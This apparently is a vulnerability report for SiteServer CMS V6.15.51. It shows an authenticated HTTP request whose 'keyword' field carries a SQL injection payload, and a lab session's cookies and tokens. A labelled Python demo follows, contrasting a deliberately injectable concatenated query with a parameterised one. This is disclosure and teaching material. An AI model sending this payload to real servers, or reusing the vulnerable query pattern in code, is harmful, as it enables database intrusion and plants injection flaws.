Tested version: https://github.com/siteserver/cms/releases/download/siteserver-v6.15.51/siteserver_install.zip
SiteServer: V6.15.51
Test environment: Windows 2012 R2
Database: SQL Server 2016
Vulnerable URL: /api/pages/cms/libraryText/list
(login required to test)
Request:
```
POST /api/pages/cms/libraryText/list HTTP/1.1
Host: 192.168.39.3:8055
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 87
Origin: http://192.168.39.3:8055
Connection: close
Referer: http://192.168.39.3:8055/SiteServer/cms/libraryText.cshtml?siteId=1
Cookie: BAIRONG.VC.ADMINLOGIN=oeLExOp9UBM0equals0; ss_administrator_access_token=M3ENIa3NKJJ39JCRHnY4PgfJqMC7lFjggL0e9S06Bs9ubZE90add0xM2aesaL0add0Cxo8Xe5VZrSanerzFU8oZaMXCC9KMxdw29fLk6uNSSoY4Pa0add0BOZfzRwKT2t3LglumO4sTUKSz0slash0ubJ9QajCyTsKpmbPu7yv20add08zpsQyVPpl3TuMITkOCIX1EwcC7CeIJ50slash0XQ9d0slash0oR8ECV0add0690add0eXRHbEImnZsLBsrhv7KML0Jhuevbhvcjs0equals0; ASP.NET_SessionId=l3tothqgmzbgljaogh1uof3y; SS-ADMIN-TOKEN=z69iWbk6QAgWtUmPiJBXDd7vXmikE7IMRbVWfh0add00xyMUHXn13zDSbfJyodBLcAQuP9kU0slash0F7SybZwZUK7ER9csWj0ODr7NgSqXfVWABfJpKMXGuT2wQudsXkhDU9JMvsrkNIPV5cKDS0UUwsItxWt94dwYeCgnKabl82uiN53cZg92iNHdF5LlWO0add0JnX0add0Vqb0XIViYPb4l3CUTpPq0add0bKGxRk56DSZLeLh9qV0jIhotDI0equals00secret0; SS-LOGIN-CAPTCHA=pyXvigbttyM0equals00secret0
Cache-Control: max-age=0

{"siteId":1,"keyword":"' and 1=(select @@Version)--","groupId":0,"page":1,"perPage":24}
```
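
Added example, not part of the original report and not SiteServer's code: it shows why a `keyword` value like the one above is parsed as SQL when spliced into a `LIKE` clause, next to a bound-parameter form that treats it as data. The report does not show the server-side query, so the table `library_text`, the query shape, and all function names are assumptions, and in-memory SQLite stands in for SQL Server.

```python
import sqlite3

# Constructed stand-in data; SiteServer's real schema is not shown in the report.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE library_text "
               "(id INTEGER PRIMARY KEY, site_id INTEGER, title TEXT)")
    db.executemany(
        "INSERT INTO library_text (site_id, title) VALUES (?, ?)",
        [(1, "Release notes"), (1, "100% coverage"),
         (1, "100 items"), (2, "Release plan")],
    )
    return db

def search_concat(db, site_id, keyword):
    """Assumed vulnerable pattern: keyword becomes part of the SQL text."""
    sql = (f"SELECT title FROM library_text WHERE site_id = {int(site_id)} "
           f"AND title LIKE '%{keyword}%' ORDER BY id")
    return [row[0] for row in db.execute(sql)]

def escape_like(value):
    """Neutralise LIKE wildcards so the keyword only matches literally."""
    return (value.replace("\\", "\\\\")
                 .replace("%", "\\%")
                 .replace("_", "\\_"))

def search_param(db, site_id, keyword):
    """Hardened form: keyword is a bound parameter, never SQL text."""
    sql = ("SELECT title FROM library_text WHERE site_id = ? "
           "AND title LIKE ? ESCAPE '\\' ORDER BY id")
    pattern = f"%{escape_like(keyword)}%"
    return [row[0] for row in db.execute(sql, (int(site_id), pattern))]

# The keyword value from the reported request body.
REPORTED = "' and 1=(select @@Version)--"

def reaches_parser(search, keyword):
    """True when the keyword altered the statement enough to raise a SQL error."""
    try:
        search(make_db(), 1, keyword)
        return False
    except sqlite3.Error:
        return True

if __name__ == "__main__":
    print("concatenated:", reaches_parser(search_concat, REPORTED))
    print("parameterised:", reaches_parser(search_param, REPORTED))
```

In the concatenated form the quote in the keyword closes the string literal and the rest is handed to the SQL parser; in the bound form the same bytes are just a search term that matches no row.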